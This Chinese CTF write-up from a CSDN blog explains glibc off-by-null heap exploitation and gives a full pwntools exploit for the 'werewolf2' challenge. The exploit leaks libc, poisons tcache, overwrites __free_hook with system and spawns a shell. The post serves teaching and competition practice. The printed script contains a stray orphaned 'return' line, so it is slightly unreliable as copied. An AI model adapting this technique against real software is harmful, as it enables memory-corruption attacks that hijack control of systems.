off by null 小结

最新推荐文章于 2024-07-06 19:01:18 发布
最新推荐文章于 2024-07-06 19:01:18 发布
阅读量3.3k 收藏 11
点赞数 5
分类专栏: ctf pwn 第三届山东新一代信息技术创新应用大赛 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43409582/article/details/109825038
版权

off by null 的一点心得

0x00

最近的一个比赛里有道off by null的题目,比较简单,但对于off by null还是不熟悉。这里写一下这题的wp和off by null的一些利用。

0x01 前置知识

off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。
这些的前提是对于堆块的合并有所了解。
向前合并与向后合并
先说向前合并

/* consolidate forward */
if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
} else
    clear_inuse_bit_at_offset(nextchunk, 0);

向前合并的检查:当一个chunk被free时去检查其物理相邻后一个chunk(next chunk)的prev_inuse位,若为0则证明此块已被free,若不是则将其prev_inuse位清0,执行free操作之后返回。接下来要检查nextchunk是不是top chunk 若是则和前一块合并,若不是则进入向前合并的流程。
向前合并流程:

  1. 让nextchunk进入unlink流程
  2. 给size加上nextsize(同理也是表示大小上两个chunk已经合并了)

向后合并

/* consolidate backward */
if (!prev_inuse(p)) {
    prevsize = p->prev_size;
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    unlink(av, p, bck, fwd);
}

先检查当前堆块的prev_inuse位是否清零,若是则进入向后合并的流程:

  1. 先把前一个堆块的位置找到即p-p->prev_inuse
  2. 修改P -> size为P -> size + FD -> size(以此来表示size大小上已经合并)
  3. 让FD进入unlink函数

通常我们会构造heap overlap去利用off by null
先介绍一下heap overlap
假设我们申请了三个堆块

+++++++++++++++++++++++++++++++++++++++++++
|   Chunk A   |   Chunk B   |   Chunk C   |
+++++++++++++++++++++++++++++++++++++++++++

一定要申请以0x100整数倍大小的堆块,例0xf8,这样可以正好写到下一个chunk的prev_inuse位。
先释放chunkA,再释放chunkB,此时触发off by null修改chunkC的prev_inuse为前两个堆块大小的总和(包括chunk头)。接着释放chunkC,此时因为向后合并会获得一个大小为chunkA+chunkB+chunkC的堆块。由于chunkB其实并不是free的,接着再把chunkB申请回来,这是我们就可以对chunkB进行任意构造了。

0x02 第三届山东新一代信息技术创新应用大赛 werewolf2

题目链接:链接
密码: fi1b

在这里插入图片描述增删改查都有
在这里插入图片描述存在off by null漏洞在这里插入图片描述且对于输入的大小没有过多检查。
2.27的libc有tacahe保护所以我们一开始就申请大一些的堆块来避免tacahe的麻烦。
先申请三个堆块为heap overlap作准备

add(0x4f8,"0")  #0 0x555555757360
add(0x1f8,"1")  #1 0x555555757860
add(0x4f8,"2")  #2 0x555555757a60
add(0x20,"/bin/sh\x00")   #3 0x555555757f60 <-防止topchunk合并,为以后攻击准备

释放chunk0。因为这里有edit功能所以直接对chunk1修改触发off by null,先用字符填满0x1f0大小,之后将chunk2的prev_inuse位改成前俩个chunk大小之和即0x200+0x500,释放chunk2。此时会得到一个大chunk包含了0,1,2chunk。
因为之前释放的chunk0是unsorted bin状态的所以有main_arena附近的指针现在把他申请回来,他会把main_arena的地址将会被推到Chunk 1的数据域,所以我们show(1)就把libc泄漏出来了。

free(0)
edit(1,"a"*0x1f0+p64(0x200+0x500))
free(2)
add(0x4f8,"aaa") #4
show(1)
ru("ion : ")
libc_base = u64(ru("\x0a\x3d")[:].ljust(8,"\x00")) -0x3ebca0
leak("libc_base",libc_base)
#gdb.attach(p)
sys = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
leak("sys",sys)
leak("free_hook",free_hook)

之后就是利用tacahe机制做double free 改free hook来get shell了

add(0x20, "11") #5
free(5)
edit(1, p64(free_hook))
gdb.attach(p)
add(0x20, "aaaa") #6
add(0x20, p64(sys)+'\n')
free(3)

完整exp:

from LibcSearcher import LibcSearcher
from sys import argv
from pwn import *
#p = process("/tmp/elf", env={"LD_PRELOAD":"/tmp/libc.so.6"})
#context.terminal = ['tmux', 'splitw', '-h']
    return (system, binsh)
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
context.terminal = ['terminator', '-x' ,'sh' , '-c']
local = 1
if local:
    p = process('./werewolf2')
else:
    p = remote("47.105.128.249",9998)
#libc = ELF('./libc-2.27.so')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def add(size,content):
    p.sendlineafter('5.Exit\n',str(1))
    p.sendlineafter('inputs your size:\n',str(size))
    p.sendlineafter('Input your action:\n',content)
 
def show(id):
    p.sendlineafter('5.Exit\n',str(2))
    p.sendlineafter('Input your id\n',str(id))
 
def edit(id,content):
    p.sendlineafter('5.Exit\n',str(3))
    p.sendlineafter('Input your id\n',str(id))
    p.sendlineafter('Input your new action\n',content)
 
def free(id):
    p.sendlineafter('5.Exit\n',str(4))
    p.sendlineafter('Input your id\n',str(id))

add(0x4f8,"0")  #0 0x555555757360
add(0x1f8,"1")  #1 0x555555757860
add(0x4f8,"2")  #2 0x555555757a60
add(0x20,"/bin/sh\x00")   #3 0x555555757f60
free(0)
edit(1,"a"*0x1f0+p64(0x200+0x500))
free(2)
#gdb.attach(p)
add(0x4f8,"aaa") #4
show(1)
ru("ion : ")
libc_base = u64(ru("\x0a\x3d")[:].ljust(8,"\x00")) -0x3ebca0
leak("libc_base",libc_base)
#gdb.attach(p)
sys = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
leak("sys",sys)
leak("free_hook",free_hook)

add(0x20, "11") #5
free(5)
edit(1, p64(free_hook))
gdb.attach(p)
add(0x20, "aaaa") #6
add(0x20, p64(sys)+'\n')
free(3)
p.interactive()

参考链接:https://www.anquanke.com/post/id/208407#h2-12

ch3nwr1d
关注
专栏目录
学习打卡2:off-by-null
一点涵的博客
09-08 850
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
ole db提供程序 mysql_SQL Server的链接服务器技术小结_mysql
weixin_30700123的博客
01-28 277
一、使用 Microsoft OLE DB Provider For ODBC 链接mysql安装MySQL的ODBC驱动MyODBC1、为MySQL建立一个ODBC系统数据源,例如:选择数据库为test ,数据源名称为myDSN2、建立链接数据库EXEC sp_addlinkedserver @server = 'MySQLTest', @srvproduct='MySQL',@provide...
【八芒星计划】 OFF BY NULL
carol2358的博客
08-31 959
八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。 这一篇全部记录off by null 文章目录2019-BALSN-CTF-plaintext 2019-BALSN-CTF-plaintext 【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】 本题进行
常回家看看之off_by_null(堆篇)
最新发布
susu_xiaosu的博客
07-06 565
💧上次介绍了堆里面的off_by_one,那么这个off_by_null和它有神马区别呢,哎,别看名字挺像,它俩无论是在栈里面还是堆里面都有很大区别的。📌off_by_one,这个我们知道可以通过溢出控制到下一个字节,体现在堆里面就是,可以控制到下一个chunk的size位,我们知道根据堆的排布,当申请0x18,0x28,0x38,等这样末尾是8时(32位的是4),那么下一个chunk的prev_size就是我们的输入数据的空间,那么off_by_one就可以修改下一个chunk的size位实现一些堆漏
tcache-off-by-null-LCTF2018_easy_heap
csdn546229768的博客
02-09 572
保护 分析 main: malloc: free: puts: 这题的保护措施做的很好,常见的free函数也没问题,但是这题有个off-by-null的漏洞,因为这题的限制条件较多所以考虑用堆重叠(overlapping heap chunk),然后就可以进行对重叠的chunk进行double free写入one_gadget到free_hook进行getshell 因为这题写入content时限制了\x00字符,那么在写入字节流时就会断掉写入 首先构造unsortbin进行合并的prev_siz
高版本libc_off_by_null(一看就懂)
qq_41683953的博客
03-16 1033
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1357
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
oracle知识小结
10-24
- 控制输出和环境设置,例如`SET ECHO {OFF|ON}`控制是否显示SQL命令,`SET NULL [text]`定义空值显示,`SET PAUSE {OFF|ON|NEXT}`控制输出暂停,`SET PAGESIZE n`设置每页显示的行数。 这些是Oracle数据库的基本...
Oracle 数据库萌新经验小结
akxj2022的博客
04-12 851
刚出道的时候,学的就是oracle数据库,后期兴趣所向,转行java, 翻出以前的总结笔记,拿来分享给大家 有点小多,想直接看文档的小伙伴可以去网盘下载(文档里有格式和目录,好看点): 链接:https://pan.baidu.com/s/1t_ybXIbRCCJFZAmqQ6lx-Q 提取码:o18i 常用查询及操作 复制表结构和数据 复制表结构及数据到新表:CREATE ...
mysql 5.7 差异备份_MySQL 5.7 新备份工具mysqlpump 使用说明 - 运维小结
weixin_35160923的博客
01-20 240
之前详细介绍了Mysqldump备份工具使用,下面说下MySQL5.7之后新添加的备份工具mysqlpump。mysqlpump是mysqldump的一个衍生,mysqldump备份功能这里就不多说了,现在看看mysqlpump到底有了哪些提升,详细可以查看官网文档。mysqlpump和mysqldump一样,属于逻辑备份,备份以SQL形式的文本保存。逻辑备份相对物理备份好处是不关心log的大小,...
sql知识的小结(一)
XianRenShan的博客
10-13 572
1.数据库的备份 1)新建数据库操作 对于操作的数据库——》右击“编写数据库脚本”--->"create 到(c)"——》“新建查询编辑器窗口” 2)在创建新的数据库后,"任务"-》“生成脚本”,这一步操作是为了在已生成的数据库中创建新的表、导入存储过程,注意导入的只是数据库的结构 3)导入数据到表中 在源数据库上右击任务-》导入数据 2.将表1的数据放到表2 --允
glibc2.29+的off by null利用
l512689096的博客
10-21 1873
本文首发自跳跳糖(http://tttang.com/archive/1614/)本文介绍了off by null的爆破法和直接法两类做法,并基于已有的高版本off by null的利用技巧做了一点改进,提出一种无特殊限制条件的直接法,更具有普适性。
off-by-null-b00ks
csdn546229768的博客
01-16 372
题目: asisctf2016_b00ks 保护 除了canary全开,因为是堆题,所以基本可以认为保护措施全开 分析 主函数 程序封装的read函数 add函数 由add函数可得出以下结构示意图: dele函数 edit函数 show函数 init_name函数 重命名的bss段 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3pp7b6E3-1642340360854)(off-by-null.assets/image-2022011620005682
BUUCTF:【x_nuca_2018_offbyone2】(off by null
weixin_51055545的博客
01-06 1322
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
【技术分享】实例剖析堆off_by_null漏洞
Innocence_0的博客
07-23 219
此时我们若在此处便写入shellcode,待后续我们劫持free_hook时,就可以无需写入libc中的system地址,而是直接填写shellcode的地址即可。(2)编辑刚刚所申请的0x30的chunk,将main_arena+88改为free_hook的地址,注意此处需要爆破半个字节。(5)控制tcache链上的fd指针,把main_arena+88的地址修改为free_hook的地址后,将其申请出来。chunk的大小是0x90,我就在此处申请一个0x30的chunk,以便对这片内存进行操作。
CTFHub技能树-----pwn off by null
saulgoodman的博客
02-03 279
【代码】CTFHub技能树-----pwn off by null
高版本libc下的off by null
weixin_45209963的博客
09-08 1871
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2158
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
dev.off() null device 1
05-21
这是一个 R 语言的命令,它用于关闭设备并返回到默认的设备。在 R 语言中,图形设备是通过 `dev.xxx()` 命令打开和关闭的,其中 `xxx` 表示设备类型,如 `pdf`、`png`、`jpeg` 等。如果在绘图时使用了一个设备(如绘制了一个图形),那么需要使用 `dev.off()` 命令关闭该设备,以便在后续的绘图中使用默认设备或其他设备。在这里,输出 `null device 1` 表示成功关闭了设备。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值